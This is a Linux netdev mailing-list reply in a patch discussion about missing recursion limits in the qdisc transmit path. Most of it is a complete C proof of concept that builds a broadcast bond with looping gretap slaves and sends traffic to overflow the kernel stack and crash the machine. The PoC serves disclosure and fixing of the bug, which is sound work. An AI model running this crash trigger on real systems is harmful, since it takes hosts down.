* Re: [PATCH net] net/core: add xmit recursion limit to qdisc transmit path
2026-03-03 4:30 ` Eric Dumazet
@ 2026-03-03 5:06 ` Xiang Mei
2026-03-03 9:43 ` Weiming Shi
1 sibling, 0 replies; 5+ messages in thread
From: Xiang Mei @ 2026-03-03 5:06 UTC (permalink / raw)
To: Eric Dumazet
Cc: bestswngs, security, davem, kuba, pabeni, horms, netdev,
linux-kernel
On Tue, Mar 03, 2026 at 05:30:11AM +0100, Eric Dumazet wrote:
> On Tue, Mar 3, 2026 at 3:37 AM <bestswngs@gmail.com> wrote:
> >
> > From: Weiming Shi <bestswngs@gmail.com>
> >
> > __dev_queue_xmit() has two transmit code paths depending on whether the
> > device has a qdisc attached:
> >
> > 1. Qdisc path (q->enqueue): calls __dev_xmit_skb()
> > 2. No-qdisc path: calls dev_hard_start_xmit() directly
> >
> > Commit 745e20f1b626 ("net: add a recursion limit in xmit path") added
> > recursion protection to the no-qdisc path via dev_xmit_recursion()
> > check and dev_xmit_recursion_inc()/dec() tracking. However, the qdisc
> > path performs no recursion depth checking at all.
> >
> > This allows unbounded recursion through qdisc-attached devices. For
> > example, a bond interface in broadcast mode with gretap slaves whose
> > remote endpoints route back through the bond creates an infinite
> > transmit loop that exhausts the kernel stack:
>
> Non lltx drivers would deadlock in HARD_TX_LOCK().
>
> I would prefer we try to fix this issue at configuration time instead
> of adding yet another expensive operations in the fast path.
>
Thanks for the review and advice.
Weiming will discuss the patching approach further when he gets back to his
computer.
> Can you provide a test ?
Here is a PoC. Because the stack grows without bound, it may trigger other
crashes as well; the expected crash is
"BUG: KASAN: stack-out-of-bounds in __unwind_start+0x2f/0x7a0".
```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/if_link.h>
#include <linux/if_tunnel.h>
#include <linux/ip.h>
#include <linux/neighbour.h>
#include <arpa/inet.h>
#include <sched.h>
extern unsigned int if_nametoindex(const char *__ifname);
#ifndef IFF_UP
#define IFF_UP 0x1
#endif
// Scratch state for building one netlink request and receiving its reply.
// nl_init() zeroes the whole structure before each request.
struct nlmsg {
// Write cursor: points into buf at the position where the next attribute goes.
char *pos;
// Number of nested attributes currently open (index of the next free slot in nested[]).
int nesting;
// Stack of nested attributes opened by nl_nest() and not yet closed by nl_done().
struct nlattr *nested[8];
// Message storage: the nlmsghdr, the fixed header and the attributes; also reused as the receive buffer by nl_send().
char buf[8192];
};
// Begin a new netlink request in nlmsg.
//
// Zeroes the whole scratch structure, fills in the message type and flags
// (NLM_F_REQUEST | NLM_F_ACK are always added), copies the `size`-byte
// family header `data` right behind the nlmsghdr, and leaves the write
// cursor at the aligned end of that header, ready for attributes.
// nlmsg_len is not set here; nl_send() fills it in.
static void nl_init(struct nlmsg *nlmsg, int typ, int flags,
		    const void *data, int size)
{
	struct nlmsghdr *req;
	char *payload;

	memset(nlmsg, 0, sizeof(*nlmsg));

	req = (struct nlmsghdr *)nlmsg->buf;
	payload = (char *)(req + 1);

	req->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | flags;
	req->nlmsg_type = typ;

	memcpy(payload, data, size);
	nlmsg->pos = payload + NLMSG_ALIGN(size);
}
// Append one attribute of type `typ` carrying `size` bytes from `data`
// at the current write cursor, then advance the cursor past it
// (rounded up with NLMSG_ALIGN). A size of 0 emits a header-only attribute.
// No bounds check is made against the end of nlmsg->buf.
static void nl_attr(struct nlmsg *nlmsg, int typ, const void *data, int size)
{
	struct nlattr *hdr = (struct nlattr *)nlmsg->pos;

	hdr->nla_type = typ;
	hdr->nla_len = sizeof(*hdr) + size;

	if (size > 0)
		memcpy(hdr + 1, data, size);

	nlmsg->pos = nlmsg->pos + NLMSG_ALIGN(hdr->nla_len);
}
// Open a nested attribute of type `typ` at the write cursor.
//
// Only the type is written now; the attribute is pushed on the nesting
// stack and its length is filled in later by the matching nl_done().
// The cursor moves past the attribute header so children follow it.
static void nl_nest(struct nlmsg *nlmsg, int typ)
{
	struct nlattr *nest = (struct nlattr *)nlmsg->pos;
	int depth = nlmsg->nesting;

	nest->nla_type = typ;

	nlmsg->nested[depth] = nest;
	nlmsg->nesting = depth + 1;

	nlmsg->pos += sizeof(*nest);
}
// Close the most recently opened nested attribute: pop it from the
// nesting stack and set its length to everything written since its header
// (distance from the attribute start to the current write cursor).
static void nl_done(struct nlmsg *nlmsg)
{
	struct nlattr *nest;

	nlmsg->nesting -= 1;
	nest = nlmsg->nested[nlmsg->nesting];

	nest->nla_len = nlmsg->pos - (char *)nest;
}
// Finalize the request built in nlmsg, send it on the netlink socket
// `sock`, and wait for the reply (read back into the same buffer).
//
// Returns 0 on success. On failure returns a non-zero value and leaves the
// reason in errno, because every caller reports failures with
// strerror(errno):
//   - send/recv failure: -1, errno as set by the system call;
//   - short send: -1, errno = EIO;
//   - reply too small to hold an nlmsghdr + nlmsgerr: -1, errno = EBADMSG;
//   - NLMSG_ERROR reply with a non-zero code: the negative code from the
//     reply is returned and errno is set to its positive value.
static int nl_send(struct nlmsg *nlmsg, int sock)
{
	struct nlmsghdr *hdr = (struct nlmsghdr *)nlmsg->buf;
	struct sockaddr_nl addr = { .nl_family = AF_NETLINK };
	ssize_t n;

	// Total length = everything written up to the cursor.
	hdr->nlmsg_len = nlmsg->pos - nlmsg->buf;

	n = sendto(sock, nlmsg->buf, hdr->nlmsg_len, 0,
		   (struct sockaddr *)&addr, sizeof(addr));
	if (n != (ssize_t)hdr->nlmsg_len) {
		// A short (non-negative) send does not set errno; give callers
		// something meaningful instead of a stale value.
		if (n >= 0)
			errno = EIO;
		return -1;
	}

	n = recv(sock, nlmsg->buf, sizeof(nlmsg->buf), 0);
	if (n < 0)
		return -1;
	if (n < (ssize_t)(sizeof(struct nlmsghdr) + sizeof(struct nlmsgerr))) {
		// Truncated reply: recv() succeeded, so errno is not set by it.
		errno = EBADMSG;
		return -1;
	}

	hdr = (struct nlmsghdr *)nlmsg->buf;
	if (hdr->nlmsg_type == NLMSG_ERROR) {
		// The error field holds a negative errno, or 0 for a plain ACK.
		int err = -((struct nlmsgerr *)(hdr + 1))->error;

		if (err) {
			errno = err;
			return -err;
		}
	}
	return 0;
}
// Ask the kernel (RTM_NEWLINK, create + exclusive) for a new link called
// `name` whose IFLA_INFO_KIND is `kind`, with no kind-specific options.
// Prints a one-line status and returns nl_send()'s result.
static int create_device(int sock, struct nlmsg *nlmsg, const char *name,
			 const char *kind)
{
	struct ifinfomsg ifi = {0};
	int rc;

	nl_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &ifi, sizeof(ifi));
	nl_attr(nlmsg, IFLA_IFNAME, name, strlen(name) + 1);

	// IFLA_LINKINFO { IFLA_INFO_KIND = kind }
	nl_nest(nlmsg, IFLA_LINKINFO);
	nl_attr(nlmsg, IFLA_INFO_KIND, kind, strlen(kind));
	nl_done(nlmsg);

	rc = nl_send(nlmsg, sock);
	printf(" create %s (%s): %s\n", name, kind, rc ? strerror(errno) : "ok");
	return rc;
}
// Create a bonding device called `name` with IFLA_BOND_MODE set to `mode`
// (passed to the kernel as a single byte). Prints a one-line status and
// returns nl_send()'s result.
static int create_bond(int sock, struct nlmsg *nlmsg, const char *name, int mode)
{
	struct ifinfomsg ifi = {0};
	uint8_t mode_byte = mode;
	int rc;

	nl_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &ifi, sizeof(ifi));
	nl_attr(nlmsg, IFLA_IFNAME, name, strlen(name) + 1);

	// IFLA_LINKINFO { IFLA_INFO_KIND = "bond", IFLA_INFO_DATA { IFLA_BOND_MODE } }
	nl_nest(nlmsg, IFLA_LINKINFO);
	nl_attr(nlmsg, IFLA_INFO_KIND, "bond", 4);
	nl_nest(nlmsg, IFLA_INFO_DATA);
	nl_attr(nlmsg, IFLA_BOND_MODE, &mode_byte, sizeof(mode_byte));
	nl_done(nlmsg);		// closes IFLA_INFO_DATA
	nl_done(nlmsg);		// closes IFLA_LINKINFO

	rc = nl_send(nlmsg, sock);
	printf(" create bond %s (mode=%d): %s\n", name, mode, rc ? strerror(errno) : "ok");
	return rc;
}
// Create a gretap device called `name`.
//
// `remote` is placed verbatim in IFLA_GRE_REMOTE (callers pass the s_addr
// of a parsed IPv4 address), and `num_tx_queues` is sent as
// IFLA_NUM_TX_QUEUES. Prints a one-line status and returns nl_send()'s
// result.
static int create_gretap(int sock, struct nlmsg *nlmsg, const char *name,
			 uint32_t remote, int num_tx_queues)
{
	struct ifinfomsg ifi = {0};
	uint32_t txq_count = num_tx_queues;
	int rc;

	nl_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &ifi, sizeof(ifi));
	nl_attr(nlmsg, IFLA_IFNAME, name, strlen(name) + 1);
	nl_attr(nlmsg, IFLA_NUM_TX_QUEUES, &txq_count, sizeof(txq_count));

	// IFLA_LINKINFO { IFLA_INFO_KIND = "gretap", IFLA_INFO_DATA { IFLA_GRE_REMOTE } }
	nl_nest(nlmsg, IFLA_LINKINFO);
	nl_attr(nlmsg, IFLA_INFO_KIND, "gretap", 6);
	nl_nest(nlmsg, IFLA_INFO_DATA);
	nl_attr(nlmsg, IFLA_GRE_REMOTE, &remote, sizeof(remote));
	nl_done(nlmsg);		// closes IFLA_INFO_DATA
	nl_done(nlmsg);		// closes IFLA_LINKINFO

	rc = nl_send(nlmsg, sock);
	printf(" create gretap %s (remote, %d txq): %s\n", name, num_tx_queues,
	       rc ? strerror(errno) : "ok");
	return rc;
}
// Enslave the interface `slave` to the interface `master` by sending an
// RTM_NEWLINK for the slave with IFLA_MASTER set to the master's ifindex.
//
// Returns -1 without sending anything if either interface name cannot be
// resolved; otherwise prints a one-line status and returns nl_send()'s
// result.
static int set_master(int sock, struct nlmsg *nlmsg, const char *slave,
		      const char *master)
{
	struct ifinfomsg hdr = {};
	int master_idx;
	int ret;

	hdr.ifi_index = if_nametoindex(slave);
	if (!hdr.ifi_index)
		return -1;

	// if_nametoindex() returns 0 for an unknown name; sending that as
	// IFLA_MASTER would not request the intended enslavement, so fail the
	// same way as for an unknown slave.
	master_idx = if_nametoindex(master);
	if (!master_idx)
		return -1;

	nl_init(nlmsg, RTM_NEWLINK, 0, &hdr, sizeof(hdr));
	nl_attr(nlmsg, IFLA_MASTER, &master_idx, sizeof(master_idx));

	ret = nl_send(nlmsg, sock);
	printf(" enslave %s -> %s: %s\n", slave, master, ret ? strerror(errno) : "ok");
	return ret;
}
// Set or clear IFF_UP on the interface `name` (non-zero `up` brings it up).
//
// Returns -1 without sending anything if the name cannot be resolved;
// otherwise prints a one-line status and returns nl_send()'s result.
static int dev_updown(int sock, struct nlmsg *nlmsg, const char *name, int up)
{
	struct ifinfomsg ifi = {0};
	int rc;

	ifi.ifi_index = if_nametoindex(name);
	if (ifi.ifi_index == 0)
		return -1;

	// Only the IFF_UP bit is touched: it is the sole bit in the change mask.
	ifi.ifi_change = IFF_UP;
	if (up)
		ifi.ifi_flags = IFF_UP;

	nl_init(nlmsg, RTM_NEWLINK, 0, &ifi, sizeof(ifi));

	rc = nl_send(nlmsg, sock);
	printf(" %s %s: %s\n", up ? "up" : "down", name, rc ? strerror(errno) : "ok");
	return rc;
}
// Add (or replace) the IPv4 address `addr_str`/`prefix` on interface `dev`
// via RTM_NEWADDR; the same address is sent as IFA_LOCAL and IFA_ADDRESS.
//
// Always prints a one-line status. Returns 0 on success; on failure
// returns non-zero with errno describing the problem:
//   - unknown interface name: -1, errno = ENODEV (nothing is sent);
//   - `addr_str` is not a valid IPv4 address: -1, errno = EINVAL
//     (nothing is sent, so no uninitialised bytes reach the kernel);
//   - otherwise whatever nl_send() reports.
static int add_addr4(int sock, struct nlmsg *nlmsg, const char *dev,
		     const char *addr_str, int prefix)
{
	struct ifaddrmsg hdr = {};
	struct in_addr addr;
	int ret = -1;

	hdr.ifa_family = AF_INET;
	hdr.ifa_prefixlen = prefix;
	hdr.ifa_scope = RT_SCOPE_UNIVERSE;
	hdr.ifa_index = if_nametoindex(dev);

	if (!hdr.ifa_index) {
		errno = ENODEV;
	} else if (inet_pton(AF_INET, addr_str, &addr) != 1) {
		// inet_pton() returns 0 for an unparsable string and leaves
		// `addr` untouched.
		errno = EINVAL;
	} else {
		nl_init(nlmsg, RTM_NEWADDR, NLM_F_CREATE | NLM_F_REPLACE, &hdr, sizeof(hdr));
		nl_attr(nlmsg, IFA_LOCAL, &addr, sizeof(addr));
		nl_attr(nlmsg, IFA_ADDRESS, &addr, sizeof(addr));
		ret = nl_send(nlmsg, sock);
	}

	printf(" addr %s %s/%d: %s\n", dev, addr_str, prefix, ret ? strerror(errno) : "ok");
	return ret;
}
// Add (or replace) the IPv6 address `addr_str`/`prefix` on interface `dev`
// via RTM_NEWADDR; the same address is sent as IFA_LOCAL and IFA_ADDRESS.
//
// Always prints a one-line status. Returns 0 on success; on failure
// returns non-zero with errno describing the problem:
//   - unknown interface name: -1, errno = ENODEV (nothing is sent);
//   - `addr_str` is not a valid IPv6 address: -1, errno = EINVAL
//     (nothing is sent, so no uninitialised bytes reach the kernel);
//   - otherwise whatever nl_send() reports.
static int add_addr6(int sock, struct nlmsg *nlmsg, const char *dev,
		     const char *addr_str, int prefix)
{
	struct ifaddrmsg hdr = {};
	struct in6_addr addr;
	int ret = -1;

	hdr.ifa_family = AF_INET6;
	hdr.ifa_prefixlen = prefix;
	hdr.ifa_scope = RT_SCOPE_UNIVERSE;
	hdr.ifa_index = if_nametoindex(dev);

	if (!hdr.ifa_index) {
		errno = ENODEV;
	} else if (inet_pton(AF_INET6, addr_str, &addr) != 1) {
		// inet_pton() returns 0 for an unparsable string and leaves
		// `addr` untouched.
		errno = EINVAL;
	} else {
		nl_init(nlmsg, RTM_NEWADDR, NLM_F_CREATE | NLM_F_REPLACE, &hdr, sizeof(hdr));
		nl_attr(nlmsg, IFA_LOCAL, &addr, sizeof(addr));
		nl_attr(nlmsg, IFA_ADDRESS, &addr, sizeof(addr));
		ret = nl_send(nlmsg, sock);
	}

	printf(" addr6 %s %s/%d: %s\n", dev, addr_str, prefix, ret ? strerror(errno) : "ok");
	return ret;
}
// Create a veth pair: `name` on this side and `peer` as the other end.
// Prints a one-line status and returns nl_send()'s result.
static int create_veth(int sock, struct nlmsg *nlmsg, const char *name,
		       const char *peer)
{
	struct ifinfomsg ifi = {0};
	int rc;

	nl_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &ifi, sizeof(ifi));
	nl_attr(nlmsg, IFLA_IFNAME, name, strlen(name) + 1);

	nl_nest(nlmsg, IFLA_LINKINFO);
	nl_attr(nlmsg, IFLA_INFO_KIND, "veth", 4);

	nl_nest(nlmsg, IFLA_INFO_DATA);
	nl_nest(nlmsg, 1 /* VETH_INFO_PEER */);
	// Reserve room for the peer's ifinfomsg; the bytes stay zero because
	// nl_init() cleared the whole buffer.
	nlmsg->pos += sizeof(struct ifinfomsg);
	nl_attr(nlmsg, IFLA_IFNAME, peer, strlen(peer) + 1);
	nl_done(nlmsg);		// closes VETH_INFO_PEER
	nl_done(nlmsg);		// closes IFLA_INFO_DATA

	nl_done(nlmsg);		// closes IFLA_LINKINFO

	rc = nl_send(nlmsg, sock);
	printf(" create veth %s<->%s: %s\n", name, peer, rc ? strerror(errno) : "ok");
	return rc;
}
// Install (or replace) a permanent IPv4 neighbour entry on interface `dev`
// mapping `addr_str` to the 6-byte link-layer address `mac`.
//
// Always prints a one-line status. Returns 0 on success; on failure
// returns non-zero with errno describing the problem:
//   - unknown interface name: -1, errno = ENODEV (nothing is sent);
//   - `addr_str` is not a valid IPv4 address: -1, errno = EINVAL
//     (nothing is sent, so no uninitialised bytes reach the kernel);
//   - otherwise whatever nl_send() reports.
static int add_neigh4(int sock, struct nlmsg *nlmsg, const char *dev,
		      const char *addr_str, const unsigned char *mac)
{
	struct ndmsg hdr = {};
	struct in_addr addr;
	int ret = -1;

	hdr.ndm_family = AF_INET;
	hdr.ndm_ifindex = if_nametoindex(dev);
	hdr.ndm_state = NUD_PERMANENT;
	hdr.ndm_type = 0;

	if (!hdr.ndm_ifindex) {
		errno = ENODEV;
	} else if (inet_pton(AF_INET, addr_str, &addr) != 1) {
		// inet_pton() returns 0 for an unparsable string and leaves
		// `addr` untouched.
		errno = EINVAL;
	} else {
		nl_init(nlmsg, RTM_NEWNEIGH, NLM_F_CREATE | NLM_F_REPLACE, &hdr, sizeof(hdr));
		nl_attr(nlmsg, NDA_DST, &addr, sizeof(addr));
		nl_attr(nlmsg, NDA_LLADDR, mac, 6);
		ret = nl_send(nlmsg, sock);
	}

	printf(" neigh %s %s: %s\n", dev, addr_str, ret ? strerror(errno) : "ok");
	return ret;
}
// Debug helper: check whether `dst_str` (IPv4, UDP port 9999) can be reached
// through the interface `devname`.
//
// Binds a UDP socket to the device, connects it to the destination, prints
// the local address the kernel picked, and sends one 64-byte datagram
// without blocking. Every step reports its outcome on stdout; failures
// are not returned to the caller.
static void debug_route(const char *devname, const char *dst_str)
{
	struct sockaddr_in peer = {0};
	int s;

	s = socket(AF_INET, SOCK_DGRAM, 0);
	if (s < 0) {
		perror(" debug: socket");
		return;
	}

	// A bind failure is reported but does not stop the probe.
	if (setsockopt(s, SOL_SOCKET, 25 /* SO_BINDTODEVICE */,
		       devname, strlen(devname) + 1) < 0)
		printf(" debug: SO_BINDTODEVICE %s: %s\n", devname, strerror(errno));

	peer.sin_family = AF_INET;
	peer.sin_port = htons(9999);
	inet_pton(AF_INET, dst_str, &peer.sin_addr);

	if (connect(s, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
		printf(" debug: connect to %s via %s: %s\n", dst_str, devname, strerror(errno));
		close(s);
		return;
	}

	struct sockaddr_in self = {0};
	socklen_t self_len = sizeof(self);
	char self_str[32];
	char payload[64] = "test";
	ssize_t sent;

	getsockname(s, (struct sockaddr *)&self, &self_len);
	inet_ntop(AF_INET, &self.sin_addr, self_str, sizeof(self_str));
	printf(" debug: route to %s via %s OK, local=%s\n", dst_str, devname, self_str);

	// Try to actually push a packet out.
	sent = send(s, payload, sizeof(payload), MSG_DONTWAIT);
	printf(" debug: send: %zd (%s)\n", sent, sent < 0 ? strerror(errno) : "ok");

	close(s);
}
// Send ten 64-byte UDP datagrams to 224.0.0.1:9999 (all-hosts multicast)
// through the interface `devname`, 100 ms apart, to actively exercise the
// recursive transmit path. The outcome of each send is printed.
static void trigger_multicast(const char *devname)
{
	struct sockaddr_in group = {0};
	char payload[64] = "trigger";
	int mcast_ttl = 1;
	int round;
	int s;

	s = socket(AF_INET, SOCK_DGRAM, 0);
	if (s < 0) {
		perror(" trigger: socket");
		return;
	}

	// Pin the socket to the device; a failure is reported but not fatal.
	if (setsockopt(s, SOL_SOCKET, 25 /* SO_BINDTODEVICE */,
		       devname, strlen(devname) + 1) < 0)
		perror(" trigger: SO_BINDTODEVICE");

	// Multicast TTL of 1 (result intentionally not checked).
	setsockopt(s, IPPROTO_IP, 33 /* IP_MULTICAST_TTL */, &mcast_ttl, sizeof(mcast_ttl));

	group.sin_family = AF_INET;
	group.sin_port = htons(9999);
	inet_pton(AF_INET, "224.0.0.1", &group.sin_addr);

	round = 0;
	while (round < 10) {
		ssize_t rc = sendto(s, payload, sizeof(payload), 0,
				    (struct sockaddr *)&group, sizeof(group));

		if (rc >= 0)
			printf(" trigger: sent multicast #%d\n", round);
		else
			printf(" trigger: sendto #%d: %s\n", round, strerror(errno));

		usleep(100000);
		round++;
	}

	close(s);
}
// PoC driver: builds a broadcast-mode bond whose gretap slaves tunnel back
// through the bond itself, then generates traffic on the bond so that each
// transmit re-enters the bond through another slave.
//
// Command-line arguments are ignored. Individual setup steps print their
// own status and are not treated as fatal; the process exits with 1 only
// if the rtnetlink socket cannot be created, 0 otherwise.
int main(int argc, char *argv[])
{
	const int num_gretaps = 7;	// number of gretap slaves / remotes
	const int num_txq = 9;		// TX queues requested per gretap
	unsigned char fake_mac[6] = {0x00, 0x11, 0x22, 0x33, 0x44, 0x55};
	char gname[16], remote_str[32];
	struct nlmsg nlmsg;
	int sock;

	(void)argc;
	(void)argv;

	printf("[*] PoC: KASAN stack-out-of-bounds in __unwind_start (xmit recursion via bond + gretap)\n");
	printf("[*] uid=%d euid=%d\n", getuid(), geteuid());

	sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
	if (sock < 0) {
		perror("socket(NETLINK_ROUTE)");
		return 1;
	}

	// Bring up loopback first
	printf("[*] Step 0: Bring up loopback...\n");
	dev_updown(sock, &nlmsg, "lo", 1);

	printf("[*] Step 1: Create bond0 in broadcast mode (mode 3)...\n");
	create_bond(sock, &nlmsg, "bond0", 3);

	printf("[*] Step 2: Bring bond0 UP and assign IPv4...\n");
	dev_updown(sock, &nlmsg, "bond0", 1);
	add_addr4(sock, &nlmsg, "bond0", "10.1.1.1", 24);

	// Create MULTIPLE gretap tunnels, each with a DIFFERENT remote address.
	// All remotes are in the 10.1.1.0/24 subnet (reachable through bond0).
	// With broadcast mode, bond sends to all slaves. Each gretap has its OWN
	// qdisc instances (pfifo_fast with TCQ_F_NOLOCK). When bond recurses:
	// - Level 0: gretap1's qdisc runs -> tunnel -> back to bond
	// - Level 1: gretap1 blocked (running), gretap2 runs -> tunnel -> bond
	// - Level 2: gretap1,2 blocked, gretap3 runs -> tunnel -> bond
	// - Level 3: gretap1,2,3 blocked, gretap4 runs -> tunnel -> bond
	// Each level adds ~8-12KB of stack (with KASAN_STACK). With 32KB stack
	// (KASAN doubles it), 4 levels = ~40-50KB -> overflow!

	// Pre-populate ARP entries BEFORE enslaving gretap devices.
	// This ensures that when IGMP/NDP is triggered by enslaving, the
	// outer GRE packets can be sent immediately (no ARP resolution queue).
	printf("[*] Step 3: Pre-populate ARP entries for all remotes...\n");
	for (int i = 0; i < num_gretaps; i++) {
		snprintf(remote_str, sizeof(remote_str), "10.1.1.%d", i + 2);
		fake_mac[5] = 0x55 + i;
		add_neigh4(sock, &nlmsg, "bond0", remote_str, fake_mac);
	}

	printf("[*] Step 4: Create %d gretap tunnels (different remotes, %d txq each)...\n",
	       num_gretaps, num_txq);
	for (int i = 0; i < num_gretaps; i++) {
		struct in_addr remote;

		snprintf(gname, sizeof(gname), "gretap%d", i + 1);
		snprintf(remote_str, sizeof(remote_str), "10.1.1.%d", i + 2);
		inet_pton(AF_INET, remote_str, &remote);
		create_gretap(sock, &nlmsg, gname, remote.s_addr, num_txq);
	}

	printf("[*] Step 5: Enslave all gretaps to bond0 and bring up...\n");
	for (int i = 0; i < num_gretaps; i++) {
		snprintf(gname, sizeof(gname), "gretap%d", i + 1);
		set_master(sock, &nlmsg, gname, "bond0");
		dev_updown(sock, &nlmsg, gname, 1);
	}

	printf("[*] Step 6: Trigger - Add IPv6 address (triggers DAD through bond)...\n");
	// DAD sends NDP through all slaves -> gretap -> tunnel -> bond -> recursion
	add_addr6(sock, &nlmsg, "bond0", "fd00::1", 64);
	sleep(3);

	printf("[*] Step 7: Toggle bond0 to retrigger IGMP/MLD...\n");
	dev_updown(sock, &nlmsg, "bond0", 0);
	usleep(200000);
	dev_updown(sock, &nlmsg, "bond0", 1);
	// fake_mac still holds the last MAC written by the Step 3 loop.
	add_neigh4(sock, &nlmsg, "bond0", "10.1.1.2", fake_mac);
	add_addr6(sock, &nlmsg, "bond0", "fd01::1", 64);
	sleep(3);

	printf("[*] Step 8: Send multicast packets through bond0...\n");
	trigger_multicast("bond0");

	printf("[*] Done. Check dmesg for KASAN report.\n");
	sleep(5);
	close(sock);
	return 0;
}
```
Please let me know if it doesn't trigger the bug.
Thanks,
Xiang
>
> Thanks.
^ permalink raw reply [flat|nested] 5+ messages in thread